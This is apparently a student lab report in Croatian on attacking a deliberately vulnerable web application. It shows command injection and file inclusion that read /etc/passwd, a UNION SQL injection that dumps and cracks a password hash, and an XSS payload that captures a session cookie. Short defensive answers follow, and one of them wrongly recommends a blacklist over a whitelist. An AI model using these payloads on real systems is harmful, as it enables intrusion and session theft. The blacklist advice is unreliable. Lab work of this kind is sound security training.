1) Izvođenje naredbi (Command Injection)

COMMAND : 1 cat /etc/passwd

OUTPUT : 

      root:x:0:0:root:/root:/bin/bash
      daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
      bin:x:2:2:bin:/bin:/usr/sbin/nologin
      sys:x:3:3:sys:/dev:/usr/sbin/nologin
      sync:x:4:65534:sync:/bin:/bin/sync
      games:x:5:60:games:/usr/games:/usr/sbin/nologin
      man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
      lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
      mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
      news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
      uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
      proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
      www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
      backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
      list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
      irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
      gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
      nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
      systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
      systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
      syslog:x:102:106::/home/syslog:/usr/sbin/nologin
      messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
      _apt:x:104:65534::/nonexistent:/usr/sbin/nologin
      uuidd:x:105:110::/run/uuidd:/usr/sbin/nologin
      avahi-autoipd:x:106:111:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
      usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
      dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
      rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
      lightdm:x:110:115:Light Display Manager:/var/lib/lightdm:/bin/false
      whoopsie:x:111:119::/nonexistent:/bin/false
      kernoops:x:112:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
      saned:x:113:121::/var/lib/saned:/usr/sbin/nologin
      colord:x:114:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin

2) Napadi SQL umetanjem (SQL injection)

COMMAND : ' UNION SELECT user, password FROM users WHERE last_name='Picasso'#

OUTPUT: 
   ID: ' UNION SELECT user, password FROM users WHERE last_name='Picasso'#
   First name: pablo
   Surname: 0d107d09f5bbe40cade3de5c71e9e9b7

PASSWORD : letmein

3) XSS (Cross Site Scripting)

COMMAND: <script>alert(document.cookie)</script>

OUTPUT: PHPSESSID=k752ok3k24530ujoc1qdg50365;security=low

COMMAND : https://mrepro.tel.fer.hr/srs/?cookie=security=low;%20PHPSESSID=k752ok3k24530ujoc1qdg50365&jmbag=0036538058

QUESTION : Kako biste zaštitili aplikaciju od ovakvih ranjivosti?

ANSWER : 
   Content security policy -> zaglavlje, definira izvore skripti kojima je dozvoljeno izvršavanje na stranici.
   Korištenje sigurnih HTTP zaglavlja poput X-XSS-Protection, X-Content-Type-Options,..
   HTTPOnly and Secure Cookies -> spriječava JavaScript da pristupi kolačićima

4) Inkluzija datoteka (File inclusion)

ERROR : The PHP function allow_url_include is not enabled.

COMMAND :
   sudo docker ps 
   sudo docker exec -it f7f3c8a00e90 find / -name php.ini
   sudo docker exec f7f3c8a00e90 sed -i 's/allow_url_include = Off/allow_url_include = On/g' /etc/php/7.0/apache2/php.ini
   sudo docker exec f7f3c8a00e90 /etc/init.d/apache2 reload

COMMAND : http://192.168.56.102/vulnerabilities/fi/?page=/etc/passwd

OUTPUT : 

      root:x:0:0:root:/root:/bin/bash
      daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
      bin:x:2:2:bin:/bin:/usr/sbin/nologin
      sys:x:3:3:sys:/dev:/usr/sbin/nologin
      sync:x:4:65534:sync:/bin:/bin/sync
      games:x:5:60:games:/usr/games:/usr/sbin/nologin
      man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
      lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
      mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
      news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
      uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
      proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
      www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
      backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
      list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
      irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
      gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
      nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
      systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
      systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
      syslog:x:102:106::/home/syslog:/usr/sbin/nologin
      messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
      _apt:x:104:65534::/nonexistent:/usr/sbin/nologin
      uuidd:x:105:110::/run/uuidd:/usr/sbin/nologin
      avahi-autoipd:x:106:111:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/usr/sbin/nologin
      usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
      dnsmasq:x:108:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
      rtkit:x:109:114:RealtimeKit,,,:/proc:/usr/sbin/nologin
      lightdm:x:110:115:Light Display Manager:/var/lib/lightdm:/bin/false
      whoopsie:x:111:119::/nonexistent:/bin/false
      kernoops:x:112:65534:Kernel Oops Tracking Daemon,,,:/:/usr/sbin/nologin
      saned:x:113:121::/var/lib/saned:/usr/sbin/nologin
      colord:x:114:123:colord colour management daemon,,,:/var/lib/colord:/usr/sbin/nologin

QUESTION : Kako biste zaštitili navedenu aplikaciju od ovakve vrste napada?

ANSWER : 1)Koristio bih apsolutne putanje umjesto relativnih
         2) Koristiti crnu listu umjesto bijele liste
         3) Onemogućio bih opasne PHP funkcije (npr: allow_url_include = Off)
         4) Koristio bih sigurnosne mehanizme kao što su Content Security Policy, HTTPOnly i Secure Cookies